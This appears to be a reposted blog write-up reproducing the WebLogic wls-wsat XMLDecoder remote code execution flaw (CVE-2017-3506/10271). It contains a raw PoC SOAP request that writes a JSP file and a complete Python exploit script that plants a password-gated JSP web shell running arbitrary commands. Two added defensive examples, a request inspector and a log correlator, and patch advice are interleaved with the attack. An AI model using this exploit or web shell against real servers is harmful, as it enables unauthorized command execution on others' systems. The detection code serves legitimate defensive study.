WebLogic RCE reproduction

admin, 2023-12-15 00:52:44

The WLS Security subcomponent of WebLogic Server (the wls-wsat web service, which feeds the SOAP WorkContext header to java.beans.XMLDecoder) has a vulnerability that allows arbitrary code execution.

PoC

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.2.100:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 582

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
                <java version="1.6.0" class="java.beans.XMLDecoder">
                    <object class="java.io.PrintWriter"> 
                        <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/vuln.jsp</string><void method="println">
                        <string>weblogic</string></void><void method="close"/>
                    </object>
                </java>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

Send the request:

http://cn-sec.com/wp-content/uploads/2023/12/20231214161632-97.jpg

Request /bea_wls_internal/vuln.jsp:

http://cn-sec.com/wp-content/uploads/2023/12/20231214161632-96.jpg

Check the file on the server:

http://cn-sec.com/wp-content/uploads/2023/12/20231214161632-81.jpg

The file has been created successfully.
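The request above works because the wls-wsat endpoint hands the WorkContext header to java.beans.XMLDecoder, which instantiates whatever classes the XML names. From a defender's side the useful check is therefore on the request body: does a WorkContext header carry an XMLDecoder document, and what classes and methods does it name? The following is an added example, not code from the write-up or from WebLogic; it uses the stdlib XML parser, the two namespace URIs from the PoC, and a second, benign SOAP message constructed for comparison.

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"
XMLDECODER = "java.beans.XMLDecoder"

# Constructed samples: the PoC body from the write-up above, and a plain SOAP
# message with no WorkContext header for comparison.
POC_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java><java version="1.6.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/vuln.jsp</string>
          <void method="println"><string>weblogic</string></void><void method="close"/>
        </object>
      </java></java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""

BENIGN_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body><ping/></soapenv:Body>
</soapenv:Envelope>"""


def inspect_workcontext(body: str) -> dict:
    """Inspect one SOAP request body as sent to /wls-wsat/*.

    Flags a WorkContext header that embeds a java.beans.XMLDecoder document
    (the deserialization sink behind CVE-2017-10271 / CVE-2017-3506) and lists
    the classes, methods and string arguments the decoder would act on, so an
    analyst can see what the request tries to do without executing it.
    """
    verdict = {
        "parse_error": False,
        "has_workcontext": False,
        "xmldecoder": False,
        "classes": [],
        "methods": [],
        "strings": [],
        "suspicious": False,
    }
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        verdict["parse_error"] = True
        return verdict

    wc = root.find(f"{{{SOAP_NS}}}Header/{{{WORKAREA_NS}}}WorkContext")
    if wc is None:
        return verdict
    verdict["has_workcontext"] = True

    for el in wc.iter():
        # Elements of the XMLDecoder bean format: <java class=...>,
        # <object class=...>, <void method=...>, <string>...</string>.
        if el.tag == "java" and el.get("class") == XMLDECODER:
            verdict["xmldecoder"] = True
        elif el.tag == "object" and el.get("class"):
            verdict["classes"].append(el.get("class"))
        elif el.tag == "void" and el.get("method"):
            verdict["methods"].append(el.get("method"))
        elif el.tag == "string":
            verdict["strings"].append((el.text or "").strip())

    # External clients have no reason to ship an XMLDecoder document in a
    # WorkContext header; treat its presence (or any <object class=...>) as hostile.
    verdict["suspicious"] = verdict["xmldecoder"] or bool(verdict["classes"])
    return verdict
```

Run against the PoC the verdict lists java.io.PrintWriter, the println/close calls and the target path, which is exactly what an analyst wants in an alert. The durable fix is Oracle's patch for these CVEs; if the WS-AT service is not used, removing or access-restricting the /wls-wsat/ endpoint removes the exposed sink altogether.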

Exploit script

import requests
import sys

def exploit(url,filename):
    content = '<% if("weblogic".equals(request.getParameter("pass"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>'
    payload = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/'+filename+'</string><void method="println"><string><![CDATA['+content+']]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8','Upgrade-Insecure-Requests':'1','Content-Type':'text/xml'}
    response = requests.post(url+'/wls-wsat/CoordinatorPortType',data=payload,headers=headers)
    if response.status_code == 500:
        print 'Shell:',url + '/bea_wls_internal/' + filename + '?pass=weblogic&cmd=whoami'
    else:
        print 'Fail'

if __name__ == '__main__':
    print '[*] WebLogic wls-wsat RCE Exp'
    print '[*] CVE-2017-3506 & CVE-2017-10271'
    print
    if len(sys.argv) == 3:
        exploit(sys.argv[1],sys.argv[2])
    else:
        print 'Usage: WebLogic_Exp.py url shell.jsp'

http://cn-sec.com/wp-content/uploads/2023/12/20231214161632-51.jpg

backdoor.jsp

http://cn-sec.com/wp-content/uploads/2023/12/20231214161632-11.jpg
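The exploit above leaves a recognisable trace in the access log: a POST to /wls-wsat/CoordinatorPortType (answered with HTTP 500, which the script treats as success) followed by a GET of a .jsp file under /bea_wls_internal/. The following is an added example, not part of the write-up, that correlates those two events over a few constructed common-log-format lines; the window length and the path patterns are assumptions taken from the paths shown above.

```python
import re
from datetime import datetime, timedelta

# Constructed access-log lines in common log format; the paths mirror the
# write-up (POST to the wls-wsat endpoint, then a GET of the written JSP).
SAMPLE_LOG = [
    '192.168.2.50 - - [14/Dec/2023:16:10:01 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1234',
    '192.168.2.50 - - [14/Dec/2023:16:10:05 +0800] "GET /bea_wls_internal/vuln.jsp HTTP/1.1" 200 33',
    '10.0.0.7 - - [14/Dec/2023:16:11:00 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5102',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# JSP files served from the internal web-app the PoC writes into (assumed pattern).
WEBSHELL_PATH_RE = re.compile(r"^/bea_wls_internal/[^?]*\.jsp")


def parse_line(line: str):
    """Parse one common-log-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_wls_wsat_activity(lines, window=timedelta(minutes=10)):
    """Return findings for POSTs to /wls-wsat/ and for JSP fetches that follow them.

    Every POST to the endpoint is reported with its status (the exploit treats
    500 as success). A JSP fetch is correlated with any POST inside `window`
    from any client, because the written file may be used from elsewhere.
    """
    events = [rec for rec in (parse_line(ln) for ln in lines) if rec]
    posts = [e for e in events if e["method"] == "POST" and e["path"].startswith("/wls-wsat/")]
    findings = [
        {"type": "wls-wsat-post", "ip": p["ip"], "status": p["status"], "ts": p["ts"].isoformat()}
        for p in posts
    ]
    for e in events:
        if e["method"] != "GET" or not WEBSHELL_PATH_RE.match(e["path"]):
            continue
        prior = [p for p in posts if timedelta(0) <= e["ts"] - p["ts"] <= window]
        if prior:
            findings.append({
                "type": "jsp-after-wls-wsat-post",
                "ip": e["ip"],
                "path": e["path"],
                "preceding_post_ips": sorted({p["ip"] for p in prior}),
            })
    return findings
```

On a real host, pair the log check with a filesystem one: any .jsp under a domain's servers/*/tmp/_WL_internal/ that is newer than the last deployment is worth a look, since that is where the PoC's PrintWriter writes.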

- By:X1r0z[exp10it.cn]

Source: WebLogic RCE 复现, https://cn-sec.com/archives/2301336.html